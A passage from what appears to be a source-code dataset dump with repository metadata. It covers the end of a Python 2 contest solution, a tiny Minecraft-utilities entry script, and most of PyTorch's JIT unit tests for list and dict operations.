x /= 10
for n in xrange(A,B+1):
#print >>sys.stderr,n
m = rotate(n,d)
while m != n: #justifiable
if A <= n < m <= B:
#print >>sys.stderr,n,m
total += 1
m = rotate(m,d)
return total
T = int(raw_input())
for t in xrange(T):
A,B = map(int,raw_input().split())
print >>sys.stderr, t
print "Case #%d:" % (t+1), test(A,B)
| [
"eewestman@gmail.com"
] | eewestman@gmail.com |
3f40de3bf8ea34878ac89bbf2ce79c907140ae72 | f11168c145b16632dff06fc1801116d97fa86964 | /python/__main__.py | 195b6842bf5b2a19bb41b338ae8a7abeaf7d7486 | [] | no_license | AJIADb9/minecraft-utils | 2c9c7d00d9c35307498209d3943db230b2562fba | 6c93bace91feac443c7f6a828e4eb81b41810a19 | refs/heads/main | 2023-06-14T03:09:40.990191 | 2021-06-20T21:39:41 | 2021-06-20T21:39:41 | 378,503,590 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 153 | py | import environment
def main():
if not environment.check_env():
print("WARN: something went wrong")
if __name__ == '__main__':
main()
| [
"ajiadb9@bgd.team"
] | ajiadb9@bgd.team |
1bda0b007453d3e75a766eb1ed7fb22ff4a6d133 | d3bfb78ec7bf3e28503416be1ac58b1170bc8742 | /test/jit/test_list_dict.py | 7a1a074cafe9547ee7f143e097e78d273035860b | [
"BSD-3-Clause",
"BSD-2-Clause",
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] | permissive | SimonZsx/pytorch | 28718a6d49fea2ef10dcc49e6231290dd0a23fd9 | 6401b2ccbc1dfa81b96983d8b35e885839847395 | refs/heads/master | 2022-11-27T22:20:16.841950 | 2020-07-26T12:33:10 | 2020-07-26T12:33:10 | 273,522,068 | 1 | 0 | NOASSERTION | 2020-06-19T15:05:57 | 2020-06-19T15:05:56 | null | UTF-8 | Python | false | false | 46,145 | py | import os
import sys
import inspect
from typing import Dict, List, Optional, Tuple
from textwrap import dedent
from collections import OrderedDict
import torch
from torch.testing import FileCheck
from torch import Tensor
# Make the helper files in test/ importable
pytorch_test_dir = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
sys.path.append(pytorch_test_dir)
from torch.testing._internal.jit_utils import JitTestCase
if __name__ == '__main__':
raise RuntimeError("This test file is not meant to be run directly, use:\n\n"
"\tpython test/test_jit.py TESTNAME\n\n"
"instead.")
class TestList(JitTestCase):
def test_in_check(self):
def int_in(x):
# type: (List[int]) -> bool
return 2 in x
self.checkScript(int_in, ([1, 2, 3],))
self.checkScript(int_in, ([1, 3, 3],))
def float_in(x):
# type: (List[float]) -> bool
return 2. in x
self.checkScript(float_in, ([1., 2., 3.],))
self.checkScript(float_in, ([1., 3., 3.],))
def str_in(x):
# type: (List[str]) -> bool
return 'hi' in x
self.checkScript(str_in, (['not', 'here'],))
self.checkScript(str_in, (['hi', 'bye'],))
self.checkScript(str_in, ([],))
def test_list_literal(self):
def reassign():
x = [1]
if True:
x = [2, 3]
return
self.checkScript(reassign, (), optimize=False)
def reassign_arity_change():
x = [1]
if True:
x = [1, 2, 3]
return
self.checkScript(reassign_arity_change, (), optimize=False)
def reassign_from_empty_literal():
x = []
if True:
x = [1, 2, 3]
return
with self.assertRaisesRegex(RuntimeError, r"previously has type List\[Tensor\]"):
self.checkScript(reassign_from_empty_literal, (), optimize=False)
def reassign_from_empty_builtin():
x = torch.jit.annotate(List[int], [])
if True:
x = [1, 2, 3]
y = torch.jit.annotate(List[float], [])
if True:
y = [1.0, 2.0, 3.0]
z = []
if True:
z = [torch.randn([1])]
return
self.checkScript(reassign_from_empty_builtin, (), optimize=False)
def reassign_bad_type():
x = [1]
if True:
x = [1.0]
return
with self.assertRaisesRegex(RuntimeError, "previously has type"):
self.checkScript(reassign_bad_type, (), optimize=False)
def reassign_nested():
x = torch.jit.annotate(List[int], [])
if True:
x = [1, 2, 3]
if True:
x = [1.0]
return
with self.assertRaisesRegex(RuntimeError, "previously has type"):
self.checkScript(reassign_nested, (), optimize=False)
def test_del(self):
def inputs():
return [1, 2, 3, 4]
def fn(x):
# type: (List[int]) -> List[int]
del x[1]
return x
python_out = fn(inputs())
# checkScript reuses the same object, but here it's being mutated so do
# it manually
cu = torch.jit.CompilationUnit()
cu.define(dedent(inspect.getsource(fn)))
self.assertEqual(cu.fn(inputs()), python_out)
self.assertEqual(torch.jit.script(fn)(inputs()), python_out)
@torch.jit.script
def fn2(x):
# type: (List[int]) -> List[int]
del x[100]
return x
with self.assertRaisesRegex(RuntimeError, "out of range"):
fn2([])
with self.assertRaisesRegex(RuntimeError, "deletion at a single index"):
@torch.jit.script
def fn(x):
# type: (List[int]) -> List[int]
del x[1:3]
return x
def test_min_bool_list(self):
def jit_min_list(a, b):
# type: (List[bool], List[bool]) -> List[bool]
return min(a, b)
self.checkScript(jit_min_list, ([True, False], [False, True]))
def test_min_max_list(self):
def jit_min_list(a, b):
# type: (List[int], List[int]) -> List[int]
return min(a, b)
def jit_min_list_float(a, b):
# type: (List[float], List[float]) -> List[float]
return min(a, b)
def jit_min_list_bool(a, b):
# type: (List[bool], List[bool]) -> List[bool]
return min(a, b)
def run_tests(func, a, b):
for t in zip(a, b):
self.checkScript(func, t)
args_left_int = [[1, 8, 8], [2, 1, 1], [], [2], [1], [1, 2, 3]]
args_right_int = [[2, 1, 1], [1, 8, 8], [], [1], [], [1, 2]]
run_tests(jit_min_list, args_left_int, args_right_int)
args_left_float = [[1., 8., 8.], [2., 1., 1.], [], [2.], [1.], [1., 2., 3.]]
args_right_float = [[2., 1., 1.], [1., 8., 8.], [], [1.], [], [1., 2.]]
run_tests(jit_min_list_float, args_left_float, args_right_float)
args_left_bool = [[], [], [], [False], [True], [False, True], [True, True],
[False, False, False], [False, False, True]]
args_right_bool = [[], [False], [True], [True], [False], [True, True],
[False, True], [False, False, True], [False, False, False]]
run_tests(jit_min_list_bool, args_left_bool, args_right_bool)
def jit_max_list(a, b):
# type: (List[int], List[int]) -> List[int]
return max(a, b)
def jit_max_list_float(a, b):
# type: (List[float], List[float]) -> List[float]
return max(a, b)
def jit_max_list_bool(a, b):
# type: (List[bool], List[bool]) -> List[bool]
return max(a, b)
args_left_int = [[1, 8, 8], [8, 1, 1], [], [1], [], [1, 2]]
args_right_int = [[8, 1, 1], [1, 8, 8], [], [2], [1], [1, 2, 3]]
run_tests(jit_max_list, args_left_int, args_right_int)
args_left_float = [[1., 8., 8.], [8., 1., 1.], [], [1.], [], [1., 2.]]
args_right_float = [[8., 1., 1.], [1., 8., 8.], [], [2.], [1.], [1., 2., 3.]]
run_tests(jit_max_list_float, args_left_float, args_right_float)
run_tests(jit_max_list_bool, args_left_bool, args_right_bool)
def test_list_gather(self):
def index():
a = [1, 2, 3]
return a[1]
self.checkScript(index, ())
def negative_index():
a = [1, 2, 3]
return a[-1]
self.checkScript(negative_index, ())
def bad_index():
a = [1, 2, 3]
return a[4]
self.checkScriptRaisesRegex(bad_index, (), Exception,
"list index out of range")
def bad_negative_index():
a = [1, 2, 3]
return a[-5]
self.checkScriptRaisesRegex(bad_negative_index, (), Exception,
"list index out of range")
def test_list_len(self):
def func():
a = [1, 2, 3]
return len(a) == 3
self.checkScript(func, ())
def func2():
a = []
return len(a) == 0
self.checkScript(func2, ())
def test_list_ops(self):
def test_equality():
a = [1, 2, 3]
b = [1, 2, 3]
return a == b
self.checkScript(test_equality, (), optimize=True)
def test_inequality():
a = [1, 2, 3]
b = [1, 2, 3]
return a != b
self.checkScript(test_equality, (), optimize=True)
def test_non_equality():
a = [1, 2, 3]
b = [3]
return a == b
self.checkScript(test_non_equality, (), optimize=True)
def test_non_inequality():
a = [1, 2, 3]
b = [3]
return a != b
self.checkScript(test_non_equality, (), optimize=True)
def test_list_equality_as_cond():
a = [1, 2, 3]
b = [3]
if a == b:
c = 1
else:
c = 2
return c
self.checkScript(test_list_equality_as_cond, (), optimize=True)
def test_list_add():
a = [1, 2, 3]
b = [2]
c = a + b
return c == [1, 2, 3, 2]
self.checkScript(test_list_add, (), optimize=True)
def test_list_add_empty():
a = [1, 2, 3]
b = torch.jit.annotate(List[int], [])
c = a + b
return c == [1, 2, 3]
self.checkScript(test_list_add_empty, (), optimize=True)
def test_tensor_list_equality():
t1 = torch.ones([1, 1])
t2 = torch.ones([1, 1])
x = [t1, t2]
y = [t2, t1]
return x == y
self.checkScript(test_tensor_list_equality, (), optimize=True)
def test_invalid_list_equality():
t1 = torch.ones([2, 2])
t2 = torch.ones([2, 2])
x = [t1, t2]
y = [t2, t1]
# will throw since the tensors have more than one element
return x == y
self.checkScriptRaisesRegex(
test_invalid_list_equality,
(),
RuntimeError,
"Boolean value of Tensor")
def test_list_sort(self):
template = dedent('''
def func():
li_1 = {list_create}
li_2 = {list_create}
li_3 = {list_create}
li_1.sort()
li_2.sort(reverse=True)
li_4 = sorted(li_3)
return li_1, li_2, li_3, li_4
''')
lists = ["[]", "[1, 3, 2]", "[True, False, True]", "[1.2, .2, 3.2]",
"[torch.tensor(1.0), torch.tensor(0.2), torch.tensor(0.5)]",
"[torch.tensor(5), torch.tensor(-2), torch.tensor(4)]"]
for li in lists:
code = template.format(list_create=li)
scope = {}
exec(code, globals(), scope)
cu = torch.jit.CompilationUnit(code)
t1 = cu.func()
t2 = scope['func']()
self.assertEqual(t1, t2)
def test_fail(x):
# type: (List[Tensor]) -> List[Tensor]
x.sort()
return x
self.checkScriptRaisesRegex(test_fail, (([torch.zeros([2]), torch.zeros([2])],)), Exception,
"Boolean value of Tensor with more than one value")
@torch.jit.script
def test_mutation():
a = [1, 2, 3]
a.sort()
return a
test_mutation()
FileCheck().check("aten::sort").run(test_mutation.graph_for())
def test_sorted_copy():
a = [torch.tensor(2), torch.tensor(0), torch.tensor(1)]
b = sorted(a)
a[0] = torch.tensor(10)
return a, b
self.checkScript(test_sorted_copy, ())
def test_list_slice(self):
def test_regular_slice():
a = [0, 1, 2, 3, 4]
return a[2:3] == [2]
self.checkScript(test_regular_slice, ())
def test_open_ended_slice():
a = [0, 1, 2, 3, 4]
return a[2:] == [2, 3, 4]
self.checkScript(test_open_ended_slice, ())
def test_open_ended_slice2():
a = [0, 1, 2, 3, 4]
return a[:2] == [0, 1]
self.checkScript(test_open_ended_slice2, ())
def test_negative_slice():
a = [0, 1, 2, 3, 4]
return a[:-1] == [0, 1, 2, 3]
self.checkScript(test_negative_slice, ())
def test_negative_slice2():
a = [0, 1, 2, 3, 4]
return a[-3:-1] == [2, 3]
self.checkScript(test_negative_slice2, ())
def test_backward_slice():
a = [0, 1, 2, 3, 4]
return a[3:2] == torch.jit.annotate(List[int], [])
self.checkScript(test_backward_slice, ())
def test_over_slice():
a = [0, 1, 2, 3, 4]
return a[3:10] == [3, 4]
self.checkScript(test_backward_slice, ())
def test_mutable_list_append(self):
def test_append():
a = [0, 1]
a.append(2)
a.append(3)
return a == [0, 1, 2, 3]
self.checkScript(test_append, ())
def test_comprehensions_basic(self):
def comp(l):
# type: (List[int]) -> List[int]
n = [x * 3 for x in l]
return n
comp([1, 2, 3])
self.checkScript(comp, ([1, 2, 3],))
def test_comprehensions_basic_float(self):
def comp(l):
# type: (List[float]) -> List[float]
n = [x * 3 for x in l]
return n
self.checkScript(comp, ([1.0, 2.0, 3.0],))
def test_comprehensions_two_comps(self):
@torch.jit.script
def comp(l1, l2):
# type: (List[int], List[int]) -> List[int]
n = [x * 3 for x in l1]
n2 = [x + 2 for x in l2]
return n + n2
self.assertEqual(comp([1, 2, 3], [4, 5]), [3, 6, 9, 6, 7])
def test_comprehension_out_type_not_in_type(self):
def list_cast():
# type: () -> int
li = [int(i) for i in [torch.tensor(0), torch.tensor(1), torch.tensor(2)]]
return li[0] + li[1] + li[2]
self.checkScript(list_cast, ())
def test_comprehension_iterable(self):
def test_func(fn, inputs):
self.assertEqual(fn(*inputs), torch.jit.script(fn)(*inputs))
def foo(names, results):
# type: (List[int], List[int]) -> List[Tuple[int, int]]
return [(k + 5, v - 2) for k, v in zip(names, results)]
test_func(foo, ([1, 2, 4], [4, 7, 9]))
test_func(foo, ([5], [4, 7, 9]))
def fn(x):
# type: (int) -> List[int]
return [i for i in range(x)] # noqa: C416
test_func(fn, (9,))
test_func(fn, (0,))
test_func(fn, (-1,))
def changes_type():
a = [float(i) for i in range(5)]
b = [float(i) for i in [1, 2, 3, 4]]
c = [(float(i), j) for i, j in enumerate([1, 2, 3, 8])]
return a, b, c
test_func(changes_type, ())
def test_zero_iter():
return [str(i) for i, j in zip("", "")]
test_func(test_zero_iter, ())
def test_mutable_list_append_2(self):
def test_append_2():
a = [0, 1]
a.append(2)
a = [1]
a.append(4)
return a == [1, 4]
self.checkScript(test_append_2, ())
def test_mutable_list_append_if(self):
def test_append_if():
a = [1]
if True:
a.append(4)
return a == [1, 4]
self.checkScript(test_append_if, ())
def test_mutable_list_append_if_else(self):
def test_append_if_else():
a = [1]
if False:
a.append(4)
else:
a.append(10)
return a == [1, 10]
self.checkScript(test_append_if_else, ())
def test_mutable_list_append_loop(self):
def test_append_loop():
a = torch.jit.annotate(List[int], [])
for i in range(5):
a.append(i)
return a == [0, 1, 2, 3, 4]
self.checkScript(test_append_loop, ())
def test_mutable_list_append_loop_if(self):
def test_append_loop_if():
a = torch.jit.annotate(List[int], [])
for i in range(5):
if i > 3:
a.append(i)
else:
a.append(0)
return a == [0, 0, 0, 0, 4]
self.checkScript(test_append_loop_if, ())
def test_mutable_list_nested_loop(self):
def test_nested_loop():
a = torch.jit.annotate(List[int], [])
for i in range(2):
for j in range(2):
a.append(i + j)
return a == [0, 1, 1, 2]
self.checkScript(test_nested_loop, ())
def test_mutable_list_function_inline(self):
@torch.jit.script
def bar(y):
# type: (List[int]) -> None
y.append(4)
@torch.jit.script
def foo():
x = [1, 2, 3]
bar(x)
return x
self.assertEqual(foo(), [1, 2, 3, 4])
def test_mutable_list_reverse_empty(self):
def test_reverse_empty():
a = []
a.reverse()
return a == []
self.checkScript(test_reverse_empty, ())
def test_mutable_list_reverse(self):
def test_reverse():
a = [1, 2, 3, 4]
a.reverse()
return a == [4, 3, 2, 1]
self.checkScript(test_reverse, ())
def test_mutable_tensor_list_reverse(self):
def test_tensor_reverse():
a = [torch.tensor(1), torch.tensor(2)]
a.reverse()
return a == [torch.tensor(2), torch.tensor(1)]
self.checkScript(test_tensor_reverse, ())
def test_mutable_list_pop_empty(self):
@torch.jit.script
def test_pop_empty():
a = torch.jit.annotate(List[int], [])
return a.pop()
with self.assertRaisesRegex(RuntimeError, "pop from empty list"):
test_pop_empty()
def test_mutable_list_pop(self):
def test_pop():
a = [1, 2, 3, 4]
b = a.pop()
return b == 4
self.checkScript(test_pop, ())
def test_mutable_list_pop2(self):
def test_pop2():
a = [1, 2, 3, 4]
b = a.pop()
return len(a) == 3
self.checkScript(test_pop2, ())
def test_mutable_list_pop_at(self):
def test_pop_at():
a = [1, 2, 3, 4]
b = a.pop(1)
return b == 2
self.checkScript(test_pop_at, ())
def test_mutable_list_pop_at2(self):
def test_pop_at2():
a = [1, 2, 3, 4]
b = a.pop(1)
return len(a) == 3
self.checkScript(test_pop_at2, ())
def test_mutable_list_pop_at_negative(self):
def test_pop_at_negative():
a = [1, 2, 3, 4]
b = a.pop(-2)
return b == 3
self.checkScript(test_pop_at_negative, ())
def test_mutable_list_pop_at_negative2(self):
def test_pop_at_negative2():
a = [1, 2, 3, 4]
b = a.pop(-2)
return len(a) == 3
self.checkScript(test_pop_at_negative2, ())
def test_mutable_list_pop_slice(self):
def test_pop_slice():
a = [1, 2, 3, 4]
b = [1, 2, 3, 4]
a.pop()
b = b[:-1]
return a == b
self.checkScript(test_pop_slice, ())
def test_mutable_list_clear_empty(self):
def test_clear_empty():
a = torch.jit.annotate(List[int], [])
a.clear()
return len(a) == 0
self.checkScript(test_clear_empty, ())
def test_mutable_list_clear(self):
def test_clear():
a = [1, 2, 3, 4]
a.clear()
return len(a) == 0
self.checkScript(test_clear, ())
def test_mutable_list_insert(self):
def test_list_insert():
a = [1, 2, 3, 4]
a.insert(2, 5)
return a == [1, 2, 5, 3, 4]
self.checkScript(test_list_insert, ())
def test_mutable_list_insert_negative(self):
def test_list_insert_negative():
a = [1, 2, 3, 4]
a.insert(-1, 5)
return a == [1, 2, 3, 5, 4]
self.checkScript(test_list_insert_negative, ())
def test_mutable_list_insert_neg_out_of_bounds(self):
def test_list_insert_neg_out_of_bounds():
a = [1, 2, 3, 4]
a.insert(-10, 5)
return a == [5, 1, 2, 3, 4]
self.checkScript(test_list_insert_neg_out_of_bounds, ())
def test_mutable_list_insert_out_of_bounds(self):
def test_list_insert_out_of_bounds():
a = [1, 2, 3, 4]
a.insert(10, 5)
return a == [1, 2, 3, 4, 5]
self.checkScript(test_list_insert_out_of_bounds, ())
def test_mutable_list_remove_not_existing(self):
@torch.jit.script
def test_list_remove_not_existing():
a = [1, 2, 3, 4]
a.remove(5)
return a
with self.assertRaisesRegex(RuntimeError, "x not in list"):
test_list_remove_not_existing()
def test_mutable_list_remove(self):
def test_list_remove():
a = [1, 2, 3, 4]
a.remove(3)
return a == [1, 2, 4]
self.checkScript(test_list_remove, ())
def test_list_index_not_existing(self):
@torch.jit.script
def list_index_not_existing():
a = [4, 1, 3, 2]
i = a.index(5)
return i
with self.assertRaisesRegex(RuntimeError, "'5' is not in list"):
list_index_not_existing()
def test_list_index(self):
def list_index():
a = [4, 1, 3, 2]
i = a.index(3)
return i == 2
self.checkScript(list_index, ())
def test_tensor_list_index(self):
def tensor_list_index():
a = [torch.tensor(4), torch.tensor(1), torch.tensor(3), torch.tensor(2)]
i = a.index(torch.tensor(3))
return i == 2
self.checkScript(tensor_list_index, ())
def test_tensor_list_index_not_existing(self):
@torch.jit.script
def tensor_list_index_not_existing():
a = [torch.tensor(4), torch.tensor(1), torch.tensor(3), torch.tensor(2)]
i = a.index(torch.tensor(5))
return i
with self.assertRaisesRegex(RuntimeError, "is not in list"):
tensor_list_index_not_existing()
def test_list_count(self):
def list_count():
a = [4, 1, 4, 2, 4]
i = a.count(4)
return i == 3
self.checkScript(list_count, ())
def test_list_count_not_existing(self):
def list_count_not_existing():
a = [4, 1, 4, 2, 4]
i = a.count(5)
return i == 0
self.checkScript(list_count_not_existing, ())
def test_tensor_list_count(self):
def tensor_list_count():
a = [torch.tensor(4), torch.tensor(1), torch.tensor(4), torch.tensor(4)]
i = a.count(torch.tensor(4))
return i == 3
self.checkScript(tensor_list_count, ())
def test_tensor_list_count_not_existing(self):
def tensor_list_count_not_existing():
a = [torch.tensor(4), torch.tensor(1), torch.tensor(4), torch.tensor(4)]
i = a.count(torch.tensor(5))
return i == 0
self.checkScript(tensor_list_count_not_existing, ())
def test_mutable_list_remove_tensor(self):
def test_list_remove_tensor():
a = [torch.ones(1), torch.zeros(1), torch.ones(2)]
a.remove(torch.zeros(1))
return len(a) == 2
self.checkScript(test_list_remove_tensor, ())
def test_mutable_list_remove2(self):
def test_list_remove2():
a = [1]
a.remove(1)
return len(a) == 0
self.checkScript(test_list_remove2, ())
def test_extend_list_mutable(self):
@torch.jit.script
def extend_list(a, b):
# type: (List[Tensor], List[Tensor]) -> List[Tensor]
a.extend(b)
return a
for l in [[], [torch.rand(2)], [torch.rand(2), torch.rand(2), torch.rand(2)]]:
for r in [[], [torch.rand(2)], [torch.rand(2), torch.rand(2), torch.rand(2)]]:
self.assertEqual(extend_list(l, r), l + r)
def test_extend_list_immutable(self):
@torch.jit.script
def extend_list(a, b):
# type: (List[int], List[int]) -> List[int]
a.extend(b)
return a
for l in [[], [1], [1, 2, 3]]:
for r in [[], [1], [1, 2, 3]]:
self.assertEqual(extend_list(l, r), l + r)
def test_copy_list_mutable(self):
@torch.jit.script
def copy_list(a):
# type: (List[Tensor]) -> List[Tensor]
return a.copy()
for l in [[], [torch.rand(2)], [torch.rand(2), torch.rand(2), torch.rand(2)]]:
self.assertEqual(copy_list(l), l)
def test_copy_list_immutable(self):
@torch.jit.script
def copy_list(a):
# type: (List[int]) -> List[int]
return a.copy()
for l in [[], [1], [1, 2, 3]]:
self.assertEqual(copy_list(l), l)
def test_min_max_single_list(self):
def min_intlist(li):
# type: (List[int]) -> int
return min(li)
def max_intlist(li):
# type: (List[int]) -> int
return max(li)
def min_boollist(li):
# type: (List[bool]) -> bool
return min(li)
def max_boollist(li):
# type: (List[bool]) -> bool
return max(li)
def min_floatlist(li):
# type: (List[float]) -> float
return min(li)
def max_floatlist(li):
# type: (List[float]) -> float
return max(li)
int_lists = [1], [2, 1, 2], [-3, 4, 2], [-2, -7, 1, 4], [2, 1, 0, 4], []
def check_list(fn, li):
if len(li) == 0:
self.checkScriptRaisesRegex(fn, (li,), Exception, "arg is an empty sequence")
else:
self.checkScript(fn, (li,))
for int_list in int_lists:
check_list(min_intlist, int_list)
check_list(max_intlist, int_list)
bool_li = list(map(lambda x: bool(x), int_list))
check_list(min_boollist, bool_li)
check_list(max_boollist, bool_li)
float_li = list(map(lambda x: float(x), int_list))
check_list(min_floatlist, float_li)
check_list(max_floatlist, float_li)
def test_to_list(self):
"""Unit tests for Tensor.tolist() function."""
"""
Boolean dtype unit tests.
"""
def to_list_bool_0D(x):
# type: (torch.Tensor) -> bool
li = torch.jit.annotate(bool, x.tolist())
return li
def to_list_bool_1D(x):
# type: (torch.Tensor) -> List[bool]
li = torch.jit.annotate(List[bool], x.tolist())
return li
def to_list_bool_2D(x):
# type: (torch.Tensor) -> List[List[bool]]
li = torch.jit.annotate(List[List[bool]], x.tolist())
return li
def to_list_bool_3D(x):
# type: (torch.Tensor) -> List[List[List[bool]]]
li = torch.jit.annotate(List[List[List[bool]]], x.tolist())
return li
self.checkScript(to_list_bool_0D, (torch.tensor(False, dtype=torch.bool),))
bool_input_1D = torch.tensor([True, False, True, False], dtype=torch.bool)
self.checkScript(to_list_bool_1D, (bool_input_1D,))
bool_input_2D = torch.tensor(
[[True, True, False], [False, True, False]], dtype=torch.bool
)
self.checkScript(to_list_bool_2D, (bool_input_2D,))
bool_input_3D = torch.tensor(
[[[True, False], [False, True]], [[True, False], [False, False]]],
dtype=torch.bool,
)
self.checkScript(to_list_bool_3D, (bool_input_3D,))
bool_input_noncontiguous = torch.tensor(
[[[True, False], [False, True]], [[True, False], [False, False]]],
dtype=torch.bool,
).transpose(0, 1)
self.checkScript(to_list_bool_3D, (bool_input_noncontiguous,))
"""
Int dtype unit tests.
"""
def to_list_int_0D(x):
# type: (torch.Tensor) -> int
li = torch.jit.annotate(int, x.tolist())
return li
def to_list_int_1D(x):
# type: (torch.Tensor) -> List[int]
li = torch.jit.annotate(List[int], x.tolist())
return li
def to_list_int_2D(x):
# type: (torch.Tensor) -> List[List[int]]
li = torch.jit.annotate(List[List[int]], x.tolist())
return li
def to_list_int_3D(x):
# type: (torch.Tensor) -> List[List[List[int]]]
li = torch.jit.annotate(List[List[List[int]]], x.tolist())
return li
self.checkScript(to_list_int_0D, (torch.tensor(1, dtype=torch.long),))
int_input_1D = torch.tensor([1, 2, 3, 4], dtype=torch.long)
self.checkScript(to_list_int_1D, (int_input_1D,))
int_input_2D = torch.tensor([[1, 2, 3], [3, 4, 5]], dtype=torch.long)
self.checkScript(to_list_int_2D, (int_input_2D,))
int_input_3D = torch.tensor(
[[[1, 2], [3, 4]], [[5, 6], [7, 8]]], dtype=torch.long
)
self.checkScript(to_list_int_3D, (int_input_3D,))
int_input_noncontiguous = torch.tensor(
[[[1, 2], [3, 4]], [[5, 6], [7, 8]]], dtype=torch.long
).transpose(0, 1)
self.checkScript(to_list_int_3D, (int_input_noncontiguous,))
"""
Float dtype unit tests.
"""
def to_list_float_0D(x):
# type: (torch.Tensor) -> float
li = torch.jit.annotate(float, x.tolist())
return li
def to_list_float_1D(x):
# type: (torch.Tensor) -> List[float]
li = torch.jit.annotate(List[float], x.tolist())
return li
def to_list_float_2D(x):
# type: (torch.Tensor) -> List[List[float]]
li = torch.jit.annotate(List[List[float]], x.tolist())
return li
def to_list_float_3D(x):
# type: (torch.Tensor) -> List[List[List[float]]]
li = torch.jit.annotate(List[List[List[float]]], x.tolist())
return li
# Test with torch.float dtype Tensors to check that they are converted to double automatically.
self.checkScript(to_list_float_0D, (torch.randn(5, dtype=torch.float)[0],))
self.checkScript(to_list_float_1D, (torch.randn(5, dtype=torch.float),))
self.checkScript(to_list_float_2D, (torch.randn(5, 6, dtype=torch.float),))
self.checkScript(to_list_float_3D, (torch.randn(5, 6, 7, dtype=torch.float),))
self.checkScript(to_list_float_3D, (torch.randn(5, 6, 7, dtype=torch.float).transpose(0, 1),))
self.checkScript(to_list_float_0D, (torch.randn(5, dtype=torch.double)[0],))
self.checkScript(to_list_float_1D, (torch.randn(5, dtype=torch.double),))
self.checkScript(to_list_float_2D, (torch.randn(5, 6, dtype=torch.double),))
self.checkScript(to_list_float_3D, (torch.randn(5, 6, 7, dtype=torch.double),))
self.checkScript(to_list_float_3D, (torch.randn(5, 6, 7, dtype=torch.double).transpose(0, 1),))
"""
Non-happy path tests:
- missing type annotation
- mismatch between type annotation and input
- type annotation with unsupported type
- type annotation with the wrong dimension
- type annotation with scalar type that doesn't match the input scalar type
"""
def to_list_missing_type_annotation(x):
# type: (torch.Tensor) -> List[float]
li = x.tolist()
return li
def to_list_incorrect_type_annotation(x):
# type: (torch.Tensor) -> List[float]
li = torch.jit.annotate(float, x.tolist())
return li
def to_list_unsupported_type_annotation(x):
# type: (torch.Tensor) -> List[float]
li = torch.jit.annotate(List[str], x.tolist())
return li
def to_list_type_annotation_wrong_dim(x):
# type: (torch.Tensor) -> List[List[float]]
li = torch.jit.annotate(List[List[float]], x.tolist())
return li
def to_list_type_annotation_incorrect_scalar_type(x):
# type: (torch.Tensor) -> List[float]
li = torch.jit.annotate(List[float], x.tolist())
return li
with self.assertRaisesRegexWithHighlight(
RuntimeError,
r"Expected type hint for result of tolist()",
"x.tolist("
):
self.checkScript(to_list_missing_type_annotation, (torch.randn(5),))
with self.assertRaisesRegexWithHighlight(
RuntimeError,
r"Return value was annotated as having type List\[float\] but is actually of type float",
"return li"
):
self.checkScript(to_list_incorrect_type_annotation, (torch.randn(5),))
with self.assertRaisesRegex(
RuntimeError, r"str is not one of the supported element types for tolist"
):
self.checkScript(to_list_unsupported_type_annotation, (torch.randn(5),))
with self.assertRaisesRegex(
RuntimeError,
r"Output annotation list dimension and runtime tensor dimension must match",
):
self.checkScript(to_list_type_annotation_wrong_dim, (torch.randn(5, dtype=torch.double),))
with self.assertRaisesRegex(
RuntimeError,
r"Output annotation element type and runtime tensor element type must match",
):
self.checkScript(
to_list_type_annotation_incorrect_scalar_type,
(torch.ones(5, dtype=torch.long),),
)
def test_to_list_gpu(self):
"""GPU tests for Tensor.tolist() function."""
if not torch.cuda.is_available() or torch.cuda.device_count() == 0:
self.skipTest("CUDA is not available")
def to_list_bool_1D(x):
# type: (torch.Tensor) -> List[bool]
li = torch.jit.annotate(List[bool], x.tolist())
return li
def to_list_int_1D(x):
# type: (torch.Tensor) -> List[int]
li = torch.jit.annotate(List[int], x.tolist())
return li
def to_list_float_1D(x):
# type: (torch.Tensor) -> List[float]
li = torch.jit.annotate(List[float], x.tolist())
return li
self.checkScript(to_list_bool_1D, (torch.tensor(
[True, False, True, False], dtype=torch.bool).cuda(),))
self.checkScript(to_list_int_1D, (torch.tensor(
[1, 2, 3, 4], dtype=torch.long).cuda(),))
self.checkScript(to_list_float_1D, (torch.randn(
5, dtype=torch.double).cuda(),))
def test_no_element_type_annotation(self):
def fn(x):
# type: (torch.Tensor) -> List
a: List = x.tolist()
return a
with self.assertRaisesRegex(RuntimeError, r"Unknown type name"):
cu = torch.jit.CompilationUnit()
cu.define(dedent(inspect.getsource(fn)))
with self.assertRaisesRegex(RuntimeError, r"Unknown type name"):
torch.jit.script(fn)
class TestDict(JitTestCase):
def dict(self):
return {u'a': torch.ones(1), u'b': torch.ones(1) + 1, u'c': torch.ones(1) + 2}
def dict2(self):
return {'x': torch.ones(1) + 100, 'y': torch.ones(1) + 101, 'z': torch.ones(1) + 102}
def test_del(self):
def inputs():
return {'hi': 2, 'bye': 3}
def fn(x):
# type: (Dict[str, int]) -> Dict[str, int]
del x['hi']
return x
python_out = fn(inputs())
# checkScript reuses the same object, but here it's being mutated so do
# it manually
cu = torch.jit.CompilationUnit()
cu.define(dedent(inspect.getsource(fn)))
self.assertEqual(cu.fn(inputs()), python_out)
self.assertEqual(torch.jit.script(fn)(inputs()), python_out)
with self.assertRaisesRegex(RuntimeError, "KeyError"):
self.checkScript(fn, [{}])
def test_keys(self):
@torch.jit.script
def keys(x):
# type: (Dict[str, Tensor]) -> List[str]
return list(x.keys())
self.assertEqual(set(keys(self.dict())), set(self.dict().keys()))
@torch.jit.script
def specialized_list():
li = {1: 1, 2: 2}.keys()
li.append(3)
return li
self.assertTrue(set(specialized_list()) == set([1, 2, 3]))
def test_values(self):
@torch.jit.script
def values(x):
# type: (Dict[str, Tensor]) -> List[Tensor]
return list(x.values())
the_dict = self.dict()
self.assertEqual(set(values(the_dict)), set(the_dict.values()))
def test_len(self):
def length(x):
# type: (Dict[str, Tensor]) -> int
return len(x)
self.checkScript(length, (self.dict(),))
def test_copy(self):
def func(x):
# type: (Dict[str, Tensor]) -> Dict[str, Tensor]
return x.copy()
self.checkScript(func, (self.dict(),))
def test_items(self):
def func(x):
# type: (Dict[str, Tensor]) -> List[Tuple[str, Tensor]]
return x.items()
# The value returned by Python is in arbitrary order, so we can't use
# checkScript
scripted_func = torch.jit.script(func)
eager_out = (func(self.dict()))
script_out = (scripted_func(self.dict()))
self.assertEqual(len(eager_out), len(script_out))
for item in eager_out:
self.assertTrue(item in script_out)
def test_pop(self):
def pop(x, key):
# type: (Dict[str, Tensor], str) -> Tuple[Tensor, Dict[str, Tensor]]
return x.pop(key), x
